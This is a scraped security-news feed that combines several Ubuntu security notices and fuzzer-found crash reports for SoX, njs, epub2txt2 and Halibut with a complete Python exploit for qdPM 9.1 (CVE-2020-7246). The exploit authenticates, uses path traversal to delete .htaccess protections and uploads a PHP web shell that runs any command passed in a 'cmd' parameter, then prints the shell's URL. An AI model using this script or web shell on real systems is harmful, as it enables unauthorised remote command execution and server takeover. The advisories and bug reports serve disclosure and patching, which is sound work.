Ubuntu Security Notice 5447-1 - It was discovered that logrotate incorrectly handled the state file. A local attacker could possibly use this issue to keep a lock on the state file and cause logrotate to stop working, leading to a denial of service.

    ==========================================================================Ubuntu Security Notice USN-5447-1May 26, 2022logrotate vulnerability==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 22.04 LTS- Ubuntu 21.10Summary:logrotate could be made to stop processing log files.Software Description:- logrotate: Log rotation utilityDetails:It was discovered that logrotate incorrectly handled the state file. Alocal attacker could possibly use this issue to keep a lock on the statefile and cause logrotate to stop working, leading to a denial of service.Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 22.04 LTS:  logrotate                       3.19.0-1ubuntu1.1Ubuntu 21.10:  logrotate                       3.18.0-2ubuntu1.1In general, a standard system update will make all the necessary changes.References:  https://ubuntu.com/security/notices/USN-5447-1  CVE-2022-1348Package Information:  https://launchpad.net/ubuntu/+source/logrotate/3.19.0-1ubuntu1.1  https://launchpad.net/ubuntu/+source/logrotate/3.18.0-2ubuntu1.1

Ubuntu Security Notice USN-5447-1

Ubuntu Security Notice 5446-1 - Max Justicz discovered that dpkg incorrectly handled unpacking certain source packages. If a user or an automated system were tricked into unpacking a specially crafted source package, a remote attacker could modify files outside the target unpack directory, leading to a denial of service or potentially gaining access to the system.

==========================================================================  
Ubuntu Security Notice USN-5446-1  
May 26, 2022

dpkg vulnerability  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 22.04 LTS  
- Ubuntu 21.10  
- Ubuntu 20.04 LTS  
- Ubuntu 18.04 LTS

Summary:

A malicious source package could write files outside the unpack directory.

Software Description:  
- dpkg: Debian package management system

Details:

Max Justicz discovered that dpkg incorrectly handled unpacking certain  
source packages. If a user or an automated system were tricked into  
unpacking a specially crafted source package, a remote attacker could  
modify files outside the target unpack directory, leading to a denial of  
service or potentially gaining access to the system.

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 22.04 LTS:  
  dpkg                            1.21.1ubuntu2.1  
  libdpkg-perl                    1.21.1ubuntu2.1

Ubuntu 21.10:  
  dpkg                            1.20.9ubuntu2.2  
  libdpkg-perl                    1.20.9ubuntu2.2

Ubuntu 20.04 LTS:  
  dpkg                            1.19.7ubuntu3.2  
  libdpkg-perl                    1.19.7ubuntu3.2

Ubuntu 18.04 LTS:  
  dpkg                            1.19.0.5ubuntu2.4  
  libdpkg-perl                    1.19.0.5ubuntu2.4

In general, a standard system update will make all the necessary changes.

References:  
  https://ubuntu.com/security/notices/USN-5446-1  
  CVE-2022-1664

Package Information:  
  https://launchpad.net/ubuntu/+source/dpkg/1.21.1ubuntu2.1  
  https://launchpad.net/ubuntu/+source/dpkg/1.20.9ubuntu2.2  
  https://launchpad.net/ubuntu/+source/dpkg/1.19.7ubuntu3.2  
  https://launchpad.net/ubuntu/+source/dpkg/1.19.0.5ubuntu2.4

Ubuntu Security Notice USN-5446-1

qdPM version 9.1 authenticated remote code execution exploit that leverages a path traversal.

    # Exploit Title: qdPM 9.1 - Remote Code Execution (RCE) (Authenticated)# Google Dork: intitle:qdPM 9.1. Copyright © 2020 qdpm.net# Date: 2021-08-03# Original Exploit Author: Rishal Dwivedi (Loginsoft)# Original ExploitDB ID: 47954 (https://www.exploit-db.com/exploits/47954)# Exploit Author: Leon Trappett (thepcn3rd)# Vendor Homepage: http://qdpm.net/# Software Link: http://qdpm.net/download-qdpm-free-project-management# Version: <=1.9.1# Tested on: Ubuntu Server 20.04 (Python 3.9.2)# CVE : CVE-2020-7246# Exploit written in Python 3.9.2# Tested Environment - Ubuntu Server 20.04 LTS# Path Traversal + Remote Code Execution# Exploit modification: RedHatAugust#!/usr/bin/python3import sysimport requestsfrom lxml import htmlfrom argparse import ArgumentParsersession_requests = requests.session()def multifrm(userid, username, csrftoken_, EMAIL, HOSTNAME, uservar):    request_1 = {        'sf_method': (None, 'put'),        'users[id]': (None, userid[-1]),        'users[photo_preview]': (None, uservar),        'users[_csrf_token]': (None, csrftoken_[-1]),        'users[name]': (None, username[-1]),        'users[new_password]': (None, ''),        'users[email]': (None, EMAIL),        'extra_fields[9]': (None, ''),        'users[remove_photo]': (None, '1'),        }    return request_1def req(userid, username, csrftoken_, EMAIL, HOSTNAME):    request_1 = multifrm(userid, username, csrftoken_, EMAIL, HOSTNAME, '.htaccess')    new = session_requests.post(HOSTNAME + 'index.php/myAccount/update', files=request_1)    request_2 = multifrm(userid, username, csrftoken_, EMAIL, HOSTNAME, '../.htaccess')    new1 = session_requests.post(HOSTNAME + 'index.php/myAccount/update', files=request_2)    request_3 = {        'sf_method': (None, 'put'),        'users[id]': (None, userid[-1]),        'users[photo_preview]': (None, ''),        'users[_csrf_token]': (None, csrftoken_[-1]),        'users[name]': (None, username[-1]),        'users[new_password]': (None, ''),        'users[email]': (None, EMAIL),        'extra_fields[9]': (None, ''),        'users[photo]': ('backdoor.php', '<?php if(isset($_REQUEST[\'cmd\'])){ echo "<pre>"; $cmd = ($_REQUEST[\'cmd\']); system($cmd); echo "</pre>"; die; }?>', 'application/octet-stream'),        }    upload_req = session_requests.post(HOSTNAME + 'index.php/myAccount/update', files=request_3)def main(HOSTNAME, EMAIL, PASSWORD):    url = HOSTNAME + '/index.php/login'    result = session_requests.get(url)    #print(result.text)    login_tree = html.fromstring(result.text)    authenticity_token = list(set(login_tree.xpath("//input[@name='login[_csrf_token]']/@value")))[0]    payload = {'login[email]': EMAIL, 'login[password]': PASSWORD, 'login[_csrf_token]': authenticity_token}    result = session_requests.post(HOSTNAME + '/index.php/login', data=payload, headers=dict(referer=HOSTNAME + '/index.php/login'))    # The designated admin account does not have a myAccount page    account_page = session_requests.get(HOSTNAME + 'index.php/myAccount')    account_tree = html.fromstring(account_page.content)    userid = account_tree.xpath("//input[@name='users[id]']/@value")    username = account_tree.xpath("//input[@name='users[name]']/@value")    csrftoken_ = account_tree.xpath("//input[@name='users[_csrf_token]']/@value")    req(userid, username, csrftoken_, EMAIL, HOSTNAME)    get_file = session_requests.get(HOSTNAME + 'index.php/myAccount')    final_tree = html.fromstring(get_file.content)    backdoor = requests.get(HOSTNAME + "uploads/users/")    count = 0    dateStamp = "1970-01-01 00:00"    backdoorFile = ""    for line in backdoor.text.split("\n"):        count = count + 1        if "backdoor.php" in str(line):            try:                start = "\"right\""                end = " </td"                line = str(line)                dateStampNew = line[line.index(start)+8:line.index(end)]                if (dateStampNew > dateStamp):                    dateStamp = dateStampNew                    print("The DateStamp is " + dateStamp)                    backdoorFile = line[line.index("href")+6:line.index("php")+3]            except:                print("Exception occurred")                continue        #print(backdoor)    print('Backdoor uploaded at - > ' + HOSTNAME + 'uploads/users/' + backdoorFile + '?cmd=whoami')if __name__ == '__main__':    print("You are not able to use the designated admin account because they do not have a myAccount page.\n")    parser = ArgumentParser(description='qdmp - Path traversal + RCE Exploit')    parser.add_argument('-url', '--host', dest='hostname', help='Project URL')    parser.add_argument('-u', '--email', dest='email', help='User email (Any privilege account)')    parser.add_argument('-p', '--password', dest='password', help='User password')    args = parser.parse_args()    # Added detection if the arguments are passed and populated, if not display the arguments    if  (len(sys.argv) > 1 and isinstance(args.hostname, str) and isinstance(args.email, str) and isinstance(args.password, str)):            main(args.hostname, args.email, args.password)    else:        parser.print_help()

qdPM 9.1 Remote Code Execution

Ubuntu Security Notice 5445-1 - Ace Olszowka discovered that Subversion incorrectly handled certain svnserve requests. A remote attacker could possibly use this issue to cause svnserver to crash, resulting in a denial of service. This issue only affected Ubuntu 18.04 LTS. Tomas Bortoli discovered that Subversion incorrectly handled certain svnserve requests. A remote attacker could possibly use this issue to cause svnserver to crash, resulting in a denial of service. This issue only affected Ubuntu 18.04 LTS.

==========================================================================  
Ubuntu Security Notice USN-5445-1  
May 26, 2022

subversion vulnerabilities  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 20.04 LTS  
- Ubuntu 18.04 LTS

Summary:

Several security issues were fixed in subversion.

Software Description:  
- subversion: Advanced version control system

Details:

Ace Olszowka discovered that Subversion incorrectly handled certain  
svnserve requests. A remote attacker could possibly use this issue to cause  
svnserver to crash, resulting in a denial of service. This issue only  
affected Ubuntu 18.04 LTS. (CVE-2018-11782)

Tomas Bortoli discovered that Subversion incorrectly handled certain  
svnserve requests. A remote attacker could possibly use this issue to cause  
svnserver to crash, resulting in a denial of service. This issue only  
affected Ubuntu 18.04 LTS. (CVE-2019-0203)

Thomas Åkesson discovered that Subversion incorrectly handled certain  
inputs. An attacker could possibly use this issue to cause a denial of  
service. (CVE-2020-17525)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 20.04 LTS:  
  libapache2-mod-svn              1.13.0-3ubuntu0.2  
  libsvn1                         1.13.0-3ubuntu0.2  
  subversion                      1.13.0-3ubuntu0.2

Ubuntu 18.04 LTS:  
  libapache2-mod-svn              1.9.7-4ubuntu1.1  
  libsvn1                         1.9.7-4ubuntu1.1  
  subversion                      1.9.7-4ubuntu1.1

In general, a standard system update will make all the necessary changes.

References:  
  https://ubuntu.com/security/notices/USN-5445-1  
  CVE-2018-11782, CVE-2019-0203, CVE-2020-17525

Package Information:  
  https://launchpad.net/ubuntu/+source/subversion/1.13.0-3ubuntu0.2  
  https://launchpad.net/ubuntu/+source/subversion/1.9.7-4ubuntu1.1

Ubuntu Security Notice USN-5445-1

In SoX 14.4.2, there is an assertion failure in rate_init in rate.c in libsox.a.

**summary**

Hello, I was testing my new fuzzer and found two bugs: a reachable assertion in rate\_init, rate.c:303 and a float point exception in lsx\_aiffstartwrite.

**environment**

sox latest commit 42b3557e13e0fe01a83465b672d89faddbe65f49,  
clang 12.0.1,  
Ubuntu 21.10

**step to reproduce**

compile sox with CC=clang, CFLAGS="-fsanitize=address -g"  
run command ./sox --single-threaded @@ -t aiff /dev/null

**BUG1**

sox:rate.c:303:voidrate_init(rate_t*,rate_shared_t*,double,double,double,double,double,rolloff_t,sox_bool,sox_bool,int,int,sox_bool):Assertion`factor>0'failed.
Aborted

**BUG2**

AddressSanitizer:DEADLYSIGNAL
=================================================================
==3050061==ERROR:AddressSanitizer:FPEonunknownaddress0x000000591211(pc0x000000591211bp0x7ffd7929b6b0sp0x7ffd7929b660T0)
#00x591211inlsx_aiffstartwrite(/home/kdsj/workspace/fuzz/sox-aiff/sox+0x591211)
#10x83e26finopen_write(/home/kdsj/workspace/fuzz/sox-aiff/sox+0x83e26f)
#20x83b303insox_open_write(/home/kdsj/workspace/fuzz/sox-aiff/sox+0x83b303)
#30x8a4ae8inopen_output_file(/home/kdsj/workspace/fuzz/sox-aiff/sox+0x8a4ae8)
#40x8952e1inprocess(/home/kdsj/workspace/fuzz/sox-aiff/sox+0x8952e1)
#50x887e23inmain(/home/kdsj/workspace/fuzz/sox-aiff/sox+0x887e23)
#60x7fac08e4afcfin__libc_start_call_main../sysdeps/nptl/libc_start_call_main.h:58
#70x7fac08e4b07cin__libc_start_main_impl../csu/libc-start.c:409
#80x408864in_start(/home/kdsj/workspace/fuzz/sox-aiff/sox+0x408864)

AddressSanitizercannotprovideadditionalinfo.
SUMMARY:AddressSanitizer:FPE(/home/kdsj/workspace/fuzz/sox-aiff/sox+0x591211)inlsx_aiffstartwrite
==3050061==ABORTING

**POC**

as shown in attachment poc.zip

**Credit**

NCNIPC of China  
Hexhive

CVE-2022-31651: SoX - Sound eXchange / Bugs

Ubuntu Security Notice 5404-2 - USN-5404-1 addressed a vulnerability in Rsyslog. This update provides the corresponding update for Ubuntu 16.04 ESM. Pieter Agten discovered that Rsyslog incorrectly handled certain requests. An attacker could possibly use this issue to cause a crash.

    ==========================================================================Ubuntu Security Notice USN-5404-2May 24, 2022rsyslog vulnerability==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 16.04 ESMSummary:Rsyslog could be made to crash if it received a specially crafted request.Software Description:- rsyslog: Enhanced syslogdDetails:USN-5404-1 addressed a vulnerability in Rsyslog. This updateprovides the corresponding update for Ubuntu 16.04 ESM.Original advisory details:Pieter Agten discovered that Rsyslog incorrectly handled certain requests. An attacker could possibly use this issue to cause a crash.Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 16.04 ESM:   rsyslog                         8.16.0-1ubuntu3.1+esm2In general, a standard system update will make all the necessary changes.References:   https://ubuntu.com/security/notices/USN-5404-2   https://ubuntu.com/security/notices/USN-5404-1   CVE-2022-24903

Ubuntu Security Notice USN-5404-2

Nginx NJS v0.7.3 was discovered to contain a stack overflow in the function njs_default_module_loader at /src/njs/src/njs_module.c.

**Description**

njs 0.7.3, used in NGINX, was discovered to contain a stack-buffer-overflow in njs\_default\_module\_loader  
(/src/njs/src/njs\_module.c)

**ENV**

*   Version : 0.7.3
*   Commit : 222d6fd
*   OS : Ubuntu 18.04
*   Configure : CC=clang-14 ./configure --address-sanitizer=YES

**BT**

    root@826e0eaa5e54:/src/njs_0.7.3_debug# ./build/njs /njs/out/crash_stack-buffer-overflow_1 
    =================================================================
    ==22820==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7ffe0b253e41 at pc 0x00000049e4ca bp 0x7ffe0b252e10 sp 0x7ffe0b2525d8
    WRITE of size 21313 at 0x7ffe0b253e41 thread T0
        #0 0x49e4c9 in __asan_memcpy /src/llvm-project/compiler-rt/lib/asan/asan_interceptors_memintrinsics.cpp:22:3
        #1 0x55db4a in njs_module_path /src/njs_0.7.3_debug/src/njs_module.c:148:18
        #2 0x55db4a in njs_module_lookup /src/njs_0.7.3_debug/src/njs_module.c:83:11
        #3 0x55db4a in njs_default_module_loader /src/njs_0.7.3_debug/src/njs_module.c:377:11
        #4 0x55d195 in njs_parser_module /src/njs_0.7.3_debug/src/njs_module.c:56:14
        #5 0x59a737 in njs_parser_import /src/njs_0.7.3_debug/src/njs_parser.c:7793:24
        #6 0x56ed11 in njs_parser /src/njs_0.7.3_debug/src/njs_parser.c:598:23
        #7 0x4e92cd in njs_vm_compile /src/njs_0.7.3_debug/src/njs_vm.c:159:11
        #8 0x4d7c66 in njs_process_script /src/njs_0.7.3_debug/src/njs_shell.c:886:11
        #9 0x4d72bb in njs_process_file /src/njs_0.7.3_debug/src/njs_shell.c:619:11
        #10 0x4d72bb in main /src/njs_0.7.3_debug/src/njs_shell.c:303:15
        #11 0x7f566fabf0b2 in __libc_start_main /build/glibc-sMfBJT/glibc-2.31/csu/../csu/libc-start.c:308:16
        #12 0x41ea3d in _start (/src/njs_0.7.3_debug/build/njs+0x41ea3d)
    
    Address 0x7ffe0b253e41 is located in stack of thread T0 at offset 4129 in frame
        #0 0x55d6af in njs_default_module_loader /src/njs_0.7.3_debug/src/njs_module.c:363
    
      This frame has 6 object(s):
        [32, 4129) 'src.i' (line 115)
        [4400, 4544) 'sb.i' (line 173) <== Memory access at offset 4129 partially underflows this variable
        [4608, 8705) 'src.i.i' (line 115) <== Memory access at offset 4129 partially underflows this variable
        [8976, 8992) 'cwd' (line 365) <== Memory access at offset 4129 partially underflows this variable
        [9008, 9024) 'text' (line 365) <== Memory access at offset 4129 partially underflows this variable
        [9040, 13184) 'info' (line 368) <== Memory access at offset 4129 partially underflows this variable
    HINT: this may be a false positive if your program uses some custom stack unwind mechanism, swapcontext or vfork
          (longjmp and C++ exceptions *are* supported)
    SUMMARY: AddressSanitizer: stack-buffer-overflow /src/llvm-project/compiler-rt/lib/asan/asan_interceptors_memintrinsics.cpp:22:3 in __asan_memcpy
    Shadow bytes around the buggy address:
      0x100041642770: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x100041642780: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x100041642790: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x1000416427a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x1000416427b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    =>0x1000416427c0: 00 00 00 00 00 00 00 00[01]f2 f2 f2 f2 f2 f2 f2
      0x1000416427d0: f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2
      0x1000416427e0: f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f8 f8 f8 f8 f8 f8
      0x1000416427f0: f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f2 f2 f2 f2
      0x100041642800: f2 f2 f2 f2 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8
      0x100041642810: f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8
    Shadow byte legend (one shadow byte represents 8 application bytes):
      Addressable:           00
      Partially addressable: 01 02 03 04 05 06 07 
      Heap left redzone:       fa
      Freed heap region:       fd
      Stack left redzone:      f1
      Stack mid redzone:       f2
      Stack right redzone:     f3
      Stack after return:      f5
      Stack use after scope:   f8
      Global redzone:          f9
      Global init order:       f6
      Poisoned by user:        f7
      Container overflow:      fc
      Array cookie:            ac
      Intra object redzone:    bb
      ASan internal:           fe
      Left alloca redzone:     ca
      Right alloca redzone:    cb
    ==22820==ABORTING
    
    

**Fixed**

The issue was fixed in ab1702c.

FYI, the problem was committed in 2ff8b26 which was not released yet.

**Reference**

https://huntr.dev/bounties/a244d6e7-a5ec-47ef-9d77-8c50764ffc0a/

CVE-2022-29379: [Fixed] njs 0.7.3 was discovered to contain a stack-buffer-overflow bug in njs_default_module_loader · Issue #493 · nginx/njs

epub2txt2 v2.04 was discovered to contain an integer overflow via the function bug in _parse_special_tag at sxmlc.c. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted XML file.

Hi, there is a integer overflow bug in \_parse\_special\_tag function, sxmlc.c.  

static TagType \_parse\_special\_tag(const SXML\_CHAR\* str, int len, \_TAG\* tag, XMLNode\* node)

{

if (sx\_strncmp(str, tag->start, tag->len\_start))

return TAG\_NONE;

if (sx\_strncmp(str + len - tag->len\_end, tag->end, tag->len\_end)) /\* There probably is a '>' inside the tag \*/

return TAG\_PARTIAL;

node->tag = \_\_malloc((len - tag->len\_start - tag->len\_end + 1)\*sizeof(SXML\_CHAR));

if (node->tag == NULL)

return TAG\_ERROR;

sx\_strncpy(node->tag, str + tag->len\_start, len - tag->len\_start - tag->len\_end);

node->tag\[len - tag->len\_start - tag->len\_end\] = NULC;

node->tag\_type = tag->tag\_type;

return node->tag\_type;

}

  
It passes ((len - tag->len\_start - tag->len\_end + 1)\*sizeof(SXML\_CHAR)) as a parameter to malloc function.  
If (len - tag->len\_start - tag->len\_end) == -1, then (len - tag->len\_start - tag->len\_end + 1) == 0.  
It is legal to use 0 as an argument to the malloc function, and it will return the address of a small heap successfully.

However, in line 1214, it passes (len - tag->len\_start - tag->len\_end) as a parameter to strncpy function.  
\-1 will be coerced to an unsigned integer: 0xffffffffffffffff. It is a huge size and will make the program crashed.

poc:  
poc.zip

To reproduce:

    $ wget https://github.com/kevinboone/epub2txt2/files/8482640/poc.zip
    ......
    $ unzip poc.zip
    Archive:  poc.zip
      inflating: poc
    $ ls
    epub2txt  poc  poc.zip
    $ ./epub2txt --version
    epub2txt version 2.04
    Copyright (c)2013-2022 Kevin Boone and contributors
    Distributed under the terms of the GNU Public Licence, v3.0
    $ ./epub2txt poc
    /tmp/epub2txt5552/OPS/epb.opf  bad CRC cb87c959  (should be 0192f2f4)
    Segmentation fault (core dumped)
    

The epub2txt is built with:

    git clone https://github.com/kevinboone/epub2txt2 && cd epub2txt2
    make && sudo make install
    

Tested on: Ubuntu 20.04

CVE-2022-29358: Integer overflow bug in _parse_special_tag function, sxmlc.c · Issue #22 · kevinboone/epub2txt2

A double free in cleanup_index in index.c in Halibut 1.2 allows an attacker to cause a denial of service or possibly have other unspecified impact via a crafted text document.

Over the past year I've been studying memory corruption vulnerabilities in Linux C/C++ programs, culminating in the open sourcing of a framework called ARCUS to find and explain them automatically using a combination of dynamic tracing and symbolic analysis. My work has led to two academic conference publications, one that appeared in this year's USENIX Security Symposium and another that will appear next month at ACM CCS.

Since then, I've been going through the Debian Popularity Contest and analyzing packages, leading to the discovery of vulnerabilities like CVE-2021-42006. In this post, I'd like to share **3** new vulnerabilities I've discovered in a program called Halibut, which is a _document preparation system_ that currently sits at Rank 54,752 (by number of installs) out of 182,832 packages in the popularity contest.

**Environment**

I'm using the latest official release of Halibut, version 1.2, which is available on Debian Bullseye and Ubuntu Hirsute, to name a few Linux distributions. The target architecture is x86-64.

**Double Free in cleanup_index() in index.c**

**Steps to Reproduce:**

1.  Download the PoC.
2.  Run: halibut --winhelp poc-halibut-winhelp-df

**Stack Trace:**

#0  __GI_raise (sig=sig@entry=6) at ../sysdeps/unix/sysv/linux/raise.c:50
#1  0x00007ffff7e1c537 in __GI_abort () at abort.c:79
#2  0x00007ffff7e75768 in __libc_message (action=action@entry=do_abort, fmt=fmt@entry=0x7ffff7f83e2d "%s\n") at ../sysdeps/posix/libc_fatal.c:155
#3  0x00007ffff7e7ca5a in malloc_printerr (str=str@entry=0x7ffff7f861c8 "double free or corruption (fasttop)") at malloc.c:5347
#4  0x00007ffff7e7dd55 in _int_free (av=0x7ffff7fb5b80 <main_arena>, p=0x5555556a5500, have_lock=0) at malloc.c:4266
#5  0x00005555555784c5 in sfree (p=0x5555556a5510) at ../malloc.c:63
#6  0x000055555557867d in free_word_list (w=0x5555556ab7b0) at ../malloc.c:130
#7  0x0000555555589fd6 in cleanup_index (i=0x5555556a2390) at ../index.c:203
#8  0x0000555555578154 in main (argc=0, argv=0x7fffffffe468) at ../main.c:404

**Use-After-Free in cleanup_index() in index.c**

**Steps to Reproduce:**

1.  Download the PoC.
2.  Run: halibut --text poc-halibut-text-uaf

**Stack Trace:**

#0  __GI___libc_free (mem=0x100000001) at malloc.c:3102
#1  0x00005555555784c5 in sfree (p=0x100000001) at ../malloc.c:63
#2  0x000055555557867d in free_word_list (w=0x7000700070007) at ../malloc.c:130
#3  0x000055555557869a in free_word_list (w=0x5555556f1900) at ../malloc.c:132
#4  0x0000555555589fd6 in cleanup_index (i=0x5555556a2390) at ../index.c:203
#5  0x0000555555578154 in main (argc=0, argv=0x7fffffffe478) at ../main.c:404

**Note:** This is not the same vulnerability as the one above. Notice the recursion inside free_word_list and how the PoC triggers a segmentation fault rather than a double free abort.

**Use-After-Free in info_width_internal() in bk_info.c**

**Steps to Reproduce:**

1.  Download the PoC.
2.  Run: halibut --info poc-halibut-info-uaf

**Stack Trace:**

#0  info_width_internal (words=0x5555556e92a0, xrefs=1, cfg=0x7fffffffdf80) at ../bk_info.c:974
#1  0x000055555559c419 in info_width_internal_list (words=0x5555556e92a0, xrefs=1, cfg=0x7fffffffdf80) at ../bk_info.c:953
#2  0x000055555559c669 in info_width_internal (words=0x5555556ed5b0, xrefs=1, cfg=0x7fffffffdf80) at ../bk_info.c:1009
#3  0x000055555559c776 in info_width_xrefs (ctx=0x7fffffffdf80, words=0x5555556ed5b0) at ../bk_info.c:1041
#4  0x000055555557b0cb in wrap_para (text=0x5555556ed5b0, width=66, subsequentwidth=66, widthfn=0x55555559c751 <info_width_xrefs>, ctx=0x7fffffffdf80, natural_space=0) at ../misc.c:328
#5  0x000055555559cab8 in info_para (text=0x5555556e8440, prefix=0x5555556a2d30, prefixextra=0x5555555c859c L".", input=0x5555556bcf80, keywords=0x5555556e1cd0, indent=1, extraindent=3, width=66, 
    cfg=0x7fffffffdf80) at ../bk_info.c:1120
#6  0x000055555559b38a in info_backend (sourceform=0x5555556a7dd0, keywords=0x5555556e1cd0, idx=0x5555556a2390, unused=0x0) at ../bk_info.c:579
#7  0x0000555555578119 in main (argc=0, argv=0x7fffffffe478) at ../main.c:398

**Root Cause**

According to ARCUS, the root cause appears to be frees that occur within get_token in input.c. Specifically, it labels Line 416:

if(rsc.text){
in->pushback_chars=dupstr(rsc.text+prevpos);
sfree(rsc.text);
}

And Line 469:

}elseif(c=='{'){/* tok_lbrace */
ret.type=tok_lbrace;
sfree(rsc.text);
returnret;

There are several other lines in get_token that also call sfree and might be problematic.

CVE-2021-42613: Case Study: Security Analysis of Halibut

A use after free in info_width_internal in bk_info.c in Halibut 1.2 allows an attacker to cause a segmentation fault or possibly have unspecified other impact via a crafted text document.

Tag

#ubuntu